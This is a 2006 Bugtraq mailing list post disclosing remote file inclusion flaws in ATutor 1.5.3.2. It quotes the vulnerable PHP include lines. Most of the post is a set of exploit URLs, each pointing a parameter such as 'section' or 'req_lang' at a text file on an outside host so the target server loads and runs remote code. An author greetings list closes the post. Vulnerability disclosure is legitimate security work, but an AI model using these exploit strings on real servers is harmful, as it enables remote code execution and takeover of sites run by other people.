Home page logo
/

bugtraq logo Bugtraq mailing list archives

ATutor 1.5.3.2=> Remote File Include Vulnerability
From: subzero.0000 () hotmail com
Date: 19 Oct 2006 18:53:21 -0000

#====================================================================== 
# Atutor 
#====================================================================== 
# Info:- 
# Download: http://prdownloads.sourceforge.net/atutor/ATutor-1.5.3.2.tar.gz?download
# Version :  ATutor 1.5.3.2 
#====================================================================== 
#                                                 "programmatic Error"
#
##########################################################################################################
# require(dirname(__FILE__).'/../'.$section.'/pages.inc.php');
# Exploit: 
www.site.com/ATutor/documentation/common/frame_toc.php?section=http://members.lycos.co.uk/subzero101010/subzeroch99.txt?
# #########################################################################################################
# require('../'.$section.'/pages.inc.php');
# 
Expolit:www.site.com/ATutor/documentation/common/print.php?section=http://members.lycos.co.uk/subzero101010/subzeroch99.txt?
##########################################################################################################
# require('../'.$section.'/pages.inc.php');
# 
Expolit:www.site.com/ATutor/documentation/common/search.php?section=http://members.lycos.co.uk/subzero101010/subzeroch99.txt?
##########################################################################################################
# require('../'.$section.'/'.$req_lang.'/pages.inc.php');
# 
Expolit:www.site.com/ATutor/documentation/common/search.php?req_lang=http://members.lycos.co.uk/subzero101010/subzeroch99.txt?
###########################################################################################################
# require(dirname(__FILE__) . '/'.$req_lang.'/text.php');
# 
Expolit:www.site.com/ATutor/documentation/common/vitals.inc.php?req_lang=http://members.lycos.co.uk/subzero101010/subzeroch99.txt?
###########################################################################################################
# require(AT_MODULE_PATH . $row['dir_name'].'/module.php');
# 
Expolit:www.site.com/ATutor/include/classes/module/module.class.php?row[dir_name]=http://members.lycos.co.uk/subzero101010/subzeroch99.txt?
#####################################################################################################################
# include($lang_path.'phpmailer.lang-en.php');
#www.site.com/ATutor/include/classes/phpmailer/class.phpmailer.php?lang_path=http://members.lycos.co.uk/subzero101010/subzeroch99.txt?
######################################################################################################################
#====================================================================== 
#Discoverd By : SuBzErO
# 
#Conatact : subzero.0000[at]hotmail.com  or subzer0.0000[at]hotmail.com
#TEAM SuBzErO 
#Greetz to : FATAL ERROR - fucker_net - mohandko - rootshell - hitler jeddah - ThE-WoLf-KsA - v1per-haCker              
         
#and all members in lezr
#thanx to str0ke :) 
#WWW.XP10.COM
#WWW.LEZR.COM

=======================================================================  


  By Date           By Thread  

Current thread:
  • ATutor 1.5.3.2=> Remote File Include Vulnerability subzero . 0000 (Oct 19)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault